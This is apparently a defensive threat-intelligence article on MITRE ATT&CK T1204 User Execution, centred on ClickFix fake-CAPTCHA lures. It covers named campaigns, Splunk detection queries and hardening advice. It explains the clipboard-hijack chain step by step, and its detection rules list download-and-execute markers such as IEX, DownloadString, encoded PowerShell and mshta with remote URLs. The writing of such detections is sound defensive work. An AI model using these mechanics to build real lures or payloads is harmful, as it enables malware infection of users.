T1204: User Execution

T1204 falls under the Execution tactic (TA0002). Unlike techniques where the adversary directly exploits a vulnerability or executes code through system features, User Execution requires the target to take an action — opening a file, clicking a link, running a command, or deploying a container image. This human-in-the-loop requirement means that social engineering quality determines the technique's success rate. Poorly crafted lures fail. Convincing ones — especially those that exploit familiarity with common interfaces like CAPTCHAs, browser error messages, or IT support workflows — succeed at alarming rates.

The technique spans every platform: Windows, macOS, Linux, containers, and IaaS cloud environments. User Execution is frequently the follow-on behavior from Phishing (T1566) during initial access, but it also occurs later in the attack lifecycle when adversaries place malicious files on shared drives, send internal spearphishing messages, or compromise legitimate websites to serve ClickFix lures.

The Five Sub-Techniques

T1204.001 — Malicious Link

The user clicks a link that leads to code execution. This may be a link in a phishing email that downloads a malicious file, redirects to an exploit kit, or opens a credential harvesting page. APT28 (Fancy Bear) has used spearphishing links extensively, including links to fake OAuth consent pages that grant attackers access to victim email accounts. NOBELIUM used USAID-themed phishing emails with links that delivered the EnvyScout HTML dropper. Gamaredon Group distributes links in phishing emails that lead to malicious document downloads targeting Ukrainian government organizations.

T1204.002 — Malicious File

The most established sub-technique, covering every scenario where a user opens a malicious file that triggers code execution. This includes macro-enabled Office documents (.doc, .xls), executables disguised as documents (.exe with document icons), script files (.vbs, .js, .hta), shortcut files (.lnk), disk image files (.iso, .img), and compressed archives containing malicious payloads. The Ryuk/TrickBot/BazarLoader attack chain relies on users opening weaponized Office documents or clicking LNK files. Mustang Panda has distributed PlugX malware through malicious documents targeting government organizations. The shift from macro-enabled documents (following Microsoft's decision to block macros in internet-downloaded files by default) has driven adversaries toward LNK, ISO, and OneNote-based delivery vectors.

T1204.003 — Malicious Image

Users deploy backdoored container images (Docker, AWS AMIs, GCP Images, Azure Images) from public repositories without realizing they contain malicious code. Adversaries upload images that appear to be legitimate development tools, databases, or applications but include cryptocurrency miners, backdoors, or data theft capabilities. The cloud-native supply chain risk makes this sub-technique particularly relevant for DevOps environments where developers routinely pull images from public registries.

T1204.004 — Malicious Copy and Paste (ClickFix)

The breakout sub-technique of 2025. Adversaries present users with fake error messages, CAPTCHA prompts, or system alerts that instruct them to open a terminal or the Windows Run dialog (Windows+R) and paste a command. The malicious command is silently copied to the clipboard when the user clicks a "Fix It" or "I'm not a robot" button, then executed when the user pastes and runs it. This bypasses email filters (no attachment to scan), browser sandboxes (no file to detonate), and application control (the user initiates the execution, not an automated process).

The ClickFix technique has been adopted by COLDRIVER (Star Blizzard) for LOSTKEYS malware delivery, by Lazarus Group's Contagious Interview campaign (ClickFake Interview), by APT28, by MuddyWater, and by commodity malware operators distributing Lumma Stealer, DarkGate, AsyncRAT, NetSupport RAT, XWorm, DanaBot, and ransomware payloads including Interlock. Microsoft's August 2025 analysis documented ClickFix campaigns targeting Portuguese, Swiss, French, and Mexican government organizations with Lampion banking malware. A viral TikTok campaign used ClickFix to distribute Aura Stealer through fake software activation commands, reaching millions of users through the platform's algorithm.

T1204.005 — Malicious Application

Users are tricked into installing malicious applications that appear legitimate. This includes trojanized versions of popular software, fake mobile apps, and browser extensions that contain malicious functionality. The Contagious Interview campaign distributes BeaverTail malware disguised as legitimate video conferencing applications (fake MiroTalk, FreeConference, Zoom). Tech support scams facilitate this sub-technique through phishing, vishing, and spoofed toll-free numbers that direct victims to download remote access tools giving adversaries direct system control.

How ClickFix Works: The 2025 Threat

ClickFix has become significant enough to warrant dedicated analysis. The attack follows a consistent pattern across campaigns.

Step 1: Lure delivery. The user reaches a ClickFix page through a phishing email, compromised website, malvertisement, SEO poisoning, or social media post. Over 5,200 compromised WordPress sites have been identified serving ClickFix lures. The pages are designed to appear as familiar interfaces: Cloudflare CAPTCHA verifications, Google reCAPTCHA prompts, browser update notifications, or Microsoft error dialogs.

Step 2: Clipboard hijacking. When the user clicks the "I'm not a robot" button or "Fix It" prompt, JavaScript silently copies a malicious command to their clipboard. The user does not see this happen. The command is typically an obfuscated mshta.exe or PowerShell command that downloads and executes a payload from a remote server.

Step 3: User self-execution. The page displays instructions telling the user to press Windows+R (opening the Run dialog), then Ctrl+V (pasting the malicious command), then Enter (executing it). On macOS, users are instructed to use Terminal. Because the user initiates the execution themselves, the activity bypasses browser sandboxes, Mark-of-the-Web restrictions, SmartScreen warnings, and application control policies that block automated downloads and execution.

Step 4: Payload deployment. The pasted command typically uses mshta.exe, PowerShell, or curl to download the final payload: Lumma Stealer, NetSupport RAT, AsyncRAT, Cobalt Strike, or other malware. Multi-stage infections are common, with the initial command downloading a script that downloads additional components.

Why User Execution Matters

Bypasses technical controls. User Execution, particularly the ClickFix variant, defeats security controls that are designed to prevent malicious code from running. Email filters cannot block a clipboard copy. Browser sandboxes cannot detonate a command the user types. Application control cannot block mshta.exe or powershell.exe if those binaries are allowed by policy. Mark-of-the-Web does not apply to commands pasted into the Run dialog. The user becomes the execution engine, bypassing the defenses designed to protect them.

The human is the vulnerability. No amount of technical hardening can fully prevent a trained human from following convincing instructions. The ClickFix technique exploits familiarity with CAPTCHA verification — a process that billions of users complete daily without questioning. When a page that looks like Cloudflare's CAPTCHA tells you to verify your identity, the instinct to comply is powerful. Microsoft Defender Experts observed thousands of successful ClickFix infections per month in organizations with fully deployed EDR.

Cross-platform effectiveness. ClickFix works on Windows (Run dialog, PowerShell), macOS (Terminal), and Linux (shell). The same campaign can target all three platforms by varying the clipboard payload based on the detected operating system. The MacReaper watering hole campaign compromised approximately 2,800 legitimate websites to serve ClickFix prompts that delivered Atomic Stealer to macOS users.

Adopted by the full spectrum of threat actors. ClickFix is no longer a commodity technique. APT groups (COLDRIVER for espionage, Lazarus for cryptocurrency theft, APT28 for intelligence collection, MuddyWater for Iranian operations), ransomware affiliates (Interlock ransomware targeting SLTT organizations), and commodity malware operators (Lumma Stealer MaaS, DarkGate, SocGholish/FakeUpdates) have all integrated ClickFix into their operations. This breadth of adoption reflects the technique's effectiveness across diverse objectives.

Real-World Case Studies

COLDRIVER / LOSTKEYS — ClickFix for Russian Espionage (2025)

Google's Threat Intelligence Group documented COLDRIVER (Star Blizzard), a Russian FSB-linked espionage group, using ClickFix fake CAPTCHA lures to deliver LOSTKEYS malware in January, March, and April 2025. Victims — including advisors to Western governments, journalists, and NGOs connected to Ukraine — visited decoy websites that displayed fake CAPTCHA verification prompts. Clicking "I'm not a robot" copied a PowerShell command to the clipboard, and the page instructed victims to paste and execute it via the Windows Run dialog. The command initiated a multi-stage infection chain that ultimately installed LOSTKEYS, a file-stealing VBS malware. When GTIG published their findings, COLDRIVER abandoned LOSTKEYS within five days and deployed three replacement malware families (NOROBOT, YESROBOT, MAYBEROBOT) — all still using ClickFix-style delivery.

Lazarus Group / ClickFake Interview — Targeting Cryptocurrency Developers (2025)

North Korean actors expanded their Contagious Interview campaign with a ClickFix variant dubbed "ClickFake Interview." Victims — software developers and cryptocurrency professionals — received fake job interview invitations that led to sites displaying bogus CAPTCHAs. Copying and pasting the provided "verification token" launched PowerShell commands that installed a WebSocket RAT capable of live remote access. Separately, the campaign distributed BeaverTail malware through trojanized video conferencing applications and VS Code repositories. Sekoia researchers linked the ClickFake Interview infrastructure to North Korean operations, and the FBI seized domains associated with front companies (BlockNovas LLC) used to distribute the malware.

Lampion Banking Trojan — ClickFix Targeting Government Organizations (2025)

Microsoft identified an active ClickFix campaign distributing the Lampion banking trojan, initially targeting Portuguese government organizations in May 2025 before spreading to Switzerland, Luxembourg, France, Hungary, and Mexico. The attack chain used phishing emails containing ZIP attachments with HTML files that redirected victims to a fake Portuguese tax authority website. The ClickFix lure on this site instructed users to paste and execute a command, initiating a multi-stage infection chain with multiple obfuscation layers and non-consecutive execution stages designed to evade detection.

Interlock Ransomware — ClickFix Targeting US Government (2025)

The Center for Internet Security tracked an August 2025 Interlock ransomware incident that impacted a US State, Local, Tribal, and Territorial (SLTT) government victim using ClickFix as the initial access vector. The attack demonstrates that ClickFix has crossed from commodity malware delivery into ransomware operations targeting critical infrastructure. The user-initiated execution bypassed the organization's email filters and endpoint protections, allowing the ransomware affiliate to establish a foothold and proceed to network compromise and encryption.

MacReaper / Atomic Stealer — Massive ClickFix Watering Hole Campaign

An independent researcher documented a massive ClickFix watering hole campaign dubbed MacReaper that compromised approximately 2,800 legitimate websites to serve fake CAPTCHA prompts targeting macOS users. The campaign combined ClickFix with EtherHiding — using Binance Smart Chain contracts to conceal the payload — and instructed macOS users to open Terminal and paste a command using macOS-specific keyboard shortcuts. The command downloaded and executed Atomic Stealer, a macOS infostealer that harvests browser credentials, cryptocurrency wallets, and keychain data. The scale of the watering hole infrastructure demonstrates how ClickFix can be weaponized for broad-spectrum, platform-specific malware delivery.

Ryuk / TrickBot — Traditional Malicious File Execution

The Ryuk ransomware attack chain represents the "classic" T1204.002 pattern that preceded ClickFix. Users received phishing emails with weaponized Office documents or ZIP attachments containing malicious LNK files. Opening the document and enabling macros (or executing the LNK) installed TrickBot or BazarLoader, which then deployed Cobalt Strike for lateral movement and ultimately Ryuk ransomware for encryption. While ClickFix has become the dominant new vector, traditional malicious file execution through phishing remains a primary initial access method for ransomware operations.

Detection Strategies

Detecting User Execution requires monitoring the execution artifacts rather than the social engineering itself. By the time malicious code runs, the social engineering has already succeeded — but detection can still catch the payload before it achieves its objectives.

Key Monitoring Points

Data Source	What to Monitor	Detection Logic
Sysmon Event ID 1 (Process Creation)	ClickFix execution chain	Flag mshta.exe, powershell.exe, or cmd.exe spawned by explorer.exe with obfuscated or encoded command-line arguments, especially those containing Invoke-Expression, IEX, DownloadString, or base64 content
Sysmon Event ID 1	Malicious file execution from email clients	Flag .exe, .scr, .lnk, .hta, .vbs, .js execution where the parent process is outlook.exe, thunderbird.exe, or a browser, indicating the user opened a downloaded malicious file
Sysmon Event ID 1	mshta.exe with remote URLs	Flag mshta.exe execution with HTTP/HTTPS URLs in the command line. ClickFix commonly uses mshta to fetch and execute remote HTA payloads
PowerShell Script Block Logging (Event ID 4104)	Encoded or obfuscated commands	Flag PowerShell execution containing -EncodedCommand, FromBase64String, IEX, or Invoke-WebRequest combined with Invoke-Expression, particularly when launched from the Run dialog
Sysmon Event ID 15 (File Create Stream Hash)	Mark-of-the-Web on downloaded files	Monitor for execution of files with Zone.Identifier MOTW streams indicating internet origin, especially .iso, .img, .lnk, and .hta files
macOS / Linux Audit Logs	Terminal commands from user context	Flag curl, wget, or bash -c commands executed from Terminal that download and execute remote scripts, especially those using base64 decoding or pipe-to-bash patterns
Network Traffic	Outbound connections from mshta.exe/PowerShell	Flag outbound HTTPS connections from mshta.exe or powershell.exe to uncommon or newly registered domains immediately following user session activity

Splunk Detection Queries

Query 1: ClickFix Execution Chain Detection

Detects the distinctive ClickFix pattern: mshta.exe or powershell.exe spawned from explorer.exe (the Run dialog) with download-and-execute command-line patterns.

index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
parent_process_name=explorer.exe
(process_name=mshta.exe OR process_name=powershell.exe OR process_name=cmd.exe)
(CommandLine="*http*" OR CommandLine="*Invoke-*" OR CommandLine="*IEX*"
  OR CommandLine="*EncodedCommand*" OR CommandLine="*FromBase64*"
  OR CommandLine="*DownloadString*" OR CommandLine="*-e *" OR CommandLine="*curl *")
| table _time host user process_name CommandLine
| sort -_time

Query 2: mshta.exe Fetching Remote Content

Detects mshta.exe execution with remote URLs, the most common ClickFix payload delivery mechanism.

index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
process_name=mshta.exe
(CommandLine="*http://*" OR CommandLine="*https://*")
| table _time host user CommandLine parent_process_name parent_process_path
| sort -_time

Query 3: Suspicious File Execution from Download Locations

Detects execution of potentially malicious file types from common download directories, indicating a user opened a malicious file from a phishing email or web download.

index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(process_path="*\\Downloads\\*" OR process_path="*\\Temp\\*"
  OR process_path="*\\AppData\\Local\\Temp\\*")
(process_name="*.exe" OR process_name="*.scr" OR process_name="*.hta"
  OR process_name="*.vbs" OR process_name="*.js" OR process_name="*.bat")
NOT (process_name IN ("chrome_installer.exe","setup.exe","Teams_installer.exe"))
| table _time host user process_name process_path parent_process_name CommandLine
| sort -_time

Query 4: Rapid Discovery Commands After User Execution

Detects the reconnaissance burst that typically follows successful User Execution — adversaries immediately enumerate the compromised system.

index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(process_name IN (whoami.exe, systeminfo.exe, tasklist.exe, ipconfig.exe,
  net.exe, hostname.exe, nltest.exe, cmdkey.exe))
| bin _time span=120s
| stats count dc(process_name) as unique_commands values(process_name) as commands by _time host user
| where unique_commands >= 3
| sort -_time

Known Threat Actors and Campaigns

State-Sponsored Groups Using ClickFix (T1204.004)

Actor	Attribution	Campaign Details
COLDRIVER (Star Blizzard)	Russia (FSB)	Fake CAPTCHA ClickFix delivering LOSTKEYS, then NOROBOT/YESROBOT/MAYBEROBOT for espionage against Western government advisors and NGOs (2025)
APT28 (Fancy Bear)	Russia (GRU)	ClickFix campaigns integrated into espionage operations targeting government organizations
MuddyWater	Iran (MOIS)	ClickFix adoption in cyber espionage campaigns
Lazarus / Contagious Interview	North Korea	ClickFake Interview variant using fake job assessments with ClickFix for BeaverTail/InvisibleFerret delivery targeting cryptocurrency developers

Ransomware and Cybercrime Using User Execution

Actor / Campaign	T1204 Usage
Interlock Ransomware	ClickFix delivery targeting US SLTT government organizations (August 2025 CIS incident)
Ryuk / TrickBot / BazarLoader	Malicious Office documents and LNK files in phishing emails for ransomware deployment chain
SocGholish (FakeUpdates)	Fake browser update prompts leading to malware execution; ClickFix variants observed in 2025
Storm-1865	ClickFix campaign impersonating Booking.com targeting hospitality industry (North America, Europe, Asia)
ClearFake	Compromised websites injecting ClickFix JavaScript for fake browser update delivery

Infostealers and Commodity Malware

Malware	T1204 Usage
Lumma Stealer	Widely distributed via ClickFix since December 2024; targeting SLTT organizations and general users through fake CAPTCHAs
Atomic Stealer (macOS)	Distributed via MacReaper watering hole campaign (2,800+ compromised sites) using ClickFix with EtherHiding
DarkGate	ClickFix delivery through fake Google Meet pages and phishing
NetSupport RAT	Legitimate RMM tool trojanized and distributed via ClickFix fake browser updates (eSentire, January 2025)
AsyncRAT / VenomRAT / XWorm	Multi-stage ClickFix infection chains with XOR encryption and AMSI bypasses (Trustwave SpiderLabs)
Aura Stealer	Distributed through viral TikTok ClickFix campaign with fake software activation commands
Lampion	Banking trojan targeting government organizations via ClickFix (Portugal, Switzerland, France, Mexico; active June 2025)

Defensive Recommendations

1. Restrict Windows Run dialog and script interpreter access

ClickFix attacks depend on users being able to open the Windows Run dialog (Windows+R) and execute commands through mshta.exe or powershell.exe. Apply Group Policy restrictions that disable or restrict the Run dialog for standard users. Use AppLocker or WDAC to block execution of mshta.exe, wscript.exe, and cscript.exe for non-administrative users. Restrict PowerShell to Constrained Language Mode on workstations. These controls directly counter the ClickFix execution chain.

2. Deploy Attack Surface Reduction (ASR) rules

Microsoft's ASR rules provide targeted protection against User Execution vectors. Enable rules that block Office applications from creating child processes, block execution of potentially obfuscated scripts, block executable content from email client and webmail, and block JavaScript or VBScript from launching downloaded executable content. These rules address both traditional malicious file execution (T1204.002) and script-based ClickFix payloads (T1204.004).

3. Implement ClickFix-specific user awareness training

Traditional phishing awareness training focuses on "don't click links" and "don't open attachments." ClickFix bypasses both of these rules by having users execute commands themselves. Update security awareness programs to specifically address: legitimate CAPTCHAs never require running commands; no website should ever ask you to press Windows+R and paste anything; if a webpage asks you to copy and paste into Terminal, PowerShell, or Command Prompt, it is malicious. Include ClickFix examples in phishing simulations.

4. Deploy clipboard monitoring and intervention

ClickFix works by silently copying malicious commands to the user's clipboard. Zero Trust Network Access (ZTNA) solutions like Appgate SDP can be configured as "speed bumps" that warn users when potentially malicious content is detected in the clipboard before execution. EDR solutions can also monitor for clipboard content that contains PowerShell commands, encoded content, or download URLs, and alert or block execution.

5. Block mshta.exe for standard users

mshta.exe is the single most commonly abused binary in ClickFix attacks because it can fetch and execute remote HTA files with a single command. Blocking mshta.exe execution for non-administrative users via AppLocker or WDAC eliminates the primary ClickFix payload delivery mechanism. This has minimal operational impact because legitimate business applications rarely require mshta.exe.

6. Enable Mark-of-the-Web enforcement

Ensure that Windows SmartScreen and Mark-of-the-Web (MOTW) are enforced for all users. MOTW tags files downloaded from the internet, triggering additional security checks before execution. While ClickFix bypasses MOTW (because the command is pasted, not downloaded as a file), MOTW protections remain critical for traditional malicious file execution (T1204.002) through ISO, LNK, and executable delivery vectors.

7. Monitor for post-execution reconnaissance

Successful User Execution is almost always followed by immediate reconnaissance: whoami, systeminfo, tasklist, ipconfig, and net commands executed within seconds. Build detection rules that fire on this rapid discovery pattern following new process execution from download locations or the Run dialog. The execution-then-discovery pattern is a strong indicator of a successful User Execution attack.

8. Implement browser isolation for high-risk users

Remote Browser Isolation (RBI) renders web content in an isolated environment, preventing ClickFix JavaScript from accessing the user's actual clipboard. Even if the user follows the ClickFix instructions, the malicious command is not copied to their real system clipboard. RBI is particularly valuable for high-risk users who are targeted by nation-state ClickFix campaigns: government advisors, journalists, researchers, and executives.

MITRE ATT&CK Mapping

Field	Value
Technique ID	T1204
Technique Name	User Execution
Tactics	Execution (TA0002)
Platforms	Windows, Linux, macOS, Containers, IaaS
Sub-Techniques	T1204.001 Malicious Link, T1204.002 Malicious File, T1204.003 Malicious Image, T1204.004 Malicious Copy and Paste, T1204.005 Malicious Application
Data Sources	Process (Creation), File (Creation), Network Traffic (Connection, Content), Application Log (Content), Instance (Creation), Command (Execution)
Mitigations	Execution Prevention (M1038), User Training (M1017), Behavior Prevention on Endpoint (M1040), Network Intrusion Prevention (M1031), Restrict Web-Based Content (M1021)
Version	1.8 (last modified October 2025)
MITRE Reference	attack.mitre.org/techniques/T1204

Sources and References

• MITRE ATT&CK — T1204 User Execution: attack.mitre.org
• Microsoft Security Blog — Think Before You Click(Fix): Analyzing the ClickFix Social Engineering Technique (August 2025): microsoft.com
• Center for Internet Security — ClickFix: An Adaptive Social Engineering Technique: cisecurity.org
• Google Threat Intelligence Group — COLDRIVER Using New Malware (LOSTKEYS) via ClickFix: cloud.google.com
• Proofpoint — From Clipboard to Compromise: A PowerShell Self-Pwn (ClickFix Analysis): proofpoint.com
• SOCRadar — ClickFix and FileFix: How a Copy-Paste Trick Became 2025's Top Social Engineering Threat: socradar.io
• Security Risk Advisors — Beware of ClickFix: A Growing Social Engineering Threat: sra.io
• Darktrace — Unpacking ClickFix: Detection Insights (2025): darktrace.com
• US HHS HC3 — ClickFix Attacks Sector Alert: hhs.gov